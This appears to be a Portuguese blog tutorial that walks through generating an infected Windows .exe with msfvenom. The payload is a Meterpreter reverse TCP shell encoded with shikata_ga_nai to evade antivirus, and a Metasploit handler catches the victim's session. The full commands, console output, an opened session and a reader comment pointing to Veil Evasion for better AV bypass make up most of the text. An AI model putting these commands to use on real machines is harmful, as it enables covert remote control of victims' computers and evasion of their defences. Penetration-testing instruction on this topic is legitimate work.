Neste artigo estarei abordando a criação de uma simples shell reversa com Metasploit Framework e Meterpreter, onde iremos criar um .exe infectado que quando executado na máquina da vítima, cria uma conexão reversa com nossa máquina nos dando permissões de administrador ao seu computador.
Gerando o Backdoor com o msfvenom:
Vamos criar e encodar o payload com o msfvenom, Estaremos utilizanod um payload de reverse_TCP e o shikata ga nai para encodar nosso binário como 5 interações.
Onde:
-p : Iremos definir o Payload a ser utilizado
LHOST e LPORT : Iremos definir respectivamente o IP e Porta que o alvo irá se conectar na nossa máquina após a infecção
-f : O tipo de arquivo que iremos criar
-e : Definiremos o encoder que iremos utilizar no payload
-i : Definiremos o numero de iterações do encoder com o payload
-o: Será o arquivo de saída
Onde:
-p : Iremos definir o Payload a ser utilizado
LHOST e LPORT : Iremos definir respectivamente o IP e Porta que o alvo irá se conectar na nossa máquina após a infecção
-f : O tipo de arquivo que iremos criar
-e : Definiremos o encoder que iremos utilizar no payload
-i : Definiremos o numero de iterações do encoder com o payload
-o: Será o arquivo de saída
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.54 LPORT=4242 -f exe -e x86/shikata_ga_nai -i 5 -o WindowsHacker.exe
root@fidelis:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.54 LPORT=4242 -f exe -e x86/shikata_ga_nai -i 5 -o WindowsHacker.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai chosen with final size 468
Payload size: 468 bytes
Saved as: WindowsHacker.exe
root@fidelis:~#
No exemplo criamos o executável WindowsHacker.exe utilizando o ip da nossa máquina atacante (LHOST) e a porta 4242 (LPORT) como instrução para o trojan realizar o shell reverso com nossa, além disso realizamos 5 encodes com o shikata ga nai para tentar burlar os antivírus.
Agora na máquina alvo (Windows) vamos rodar o executável que acabamos de criar, lembrando que a máquina esta com o Windows Defender ativado.
Iniciando o Metasploit e Manipulando as sessões
# msfconsole
msf > use exploit/multi/handler
msf >set PAYLOAD windows/meterpreter/reverse_tcp
msf >set LHOST 192.168.1.54
msf >set LPORT 4242
msf >set ExitOnSession false
msf > exploit -j -z
E vamos listar nossas conexões de entrada até o momento meterpreter > sessions -l
[*] Started reverse handler on 192.168.1.54:4242
msf exploit(handler) > [*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (885806 bytes) to 192.168.1.66
[*] Meterpreter session 1 opened (192.168.1.54:4242 -> 192.168.1.66:49182) at 2015-11-13 00:23:41 -0200
msf exploit(handler) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 Test-VM\matheus @ FIDELIS-VM 192.168.1.54:4242 -> 192.168.1.66:49182 (192.168.1.66)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Notamos que ele já identificou uma conexão de entrada na porta 4242 vindo do host 192.168.1.66. Vamos tentar uma conexão criando uma shell reversa do alvo com nossa máquina
msf exploit(handler) > sessions -i 1
o problema é que o shikata ga nai não engana mais nenhum anti virus hj, uma solução seria veil evasion.
ResponderExcluir